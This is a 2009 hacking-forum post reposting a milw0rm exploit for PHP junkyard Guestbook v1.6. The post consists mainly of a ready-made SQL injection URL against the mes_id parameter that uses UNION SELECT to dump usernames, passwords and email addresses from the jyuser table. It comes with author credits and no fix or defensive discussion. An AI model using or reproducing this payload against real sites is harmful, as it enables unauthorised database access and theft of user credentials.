Multi Ethnic Hacking Group


    GBook 1.6 (mes_id) Remote SQL Injection Vulnerability

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    GBook 1.6 (mes_id) Remote SQL Injection Vulnerability

    Post by Foxi on Thu Jul 23, 2009 4:25 am

    Code:
    ##PHP junkyard Guestbook v1.6 (mes_id) Sql Injection Vuln.
    #######################################################################
    #######################################################################
    ##Yazar: Bgh7
    ##
    ##Turk Bilisim Gucleri / Ihlilal Hatti
    ##
    ##ByBgh7[a]Msn.Com
    ##
    ##Bgh7.Blogspot.Com
    ##
    ##Bug: Sql Injection
    ##
    ##İndir/Download: http://www.phpjunkyard.com/php-guestbook-script.php
    ##
    ##Not: $20.00 USD
    #######################################################################
    #######################################################################
    Sql: site/guestbook.php?mes_id=-99999 UNION SELECT 0,1,2,concat_ws(user,0x3a,pass,0x3a,mail),4,5,6,7,8,9,10,11,12 FROM jyuser--
    #######################################################################
    #######################################################################
    Thanks: m3rcil3sS & milw0rm

    # milw0rm.com [2009-07-17]


      Current date/time is Sat Sep 23, 2017 9:24 am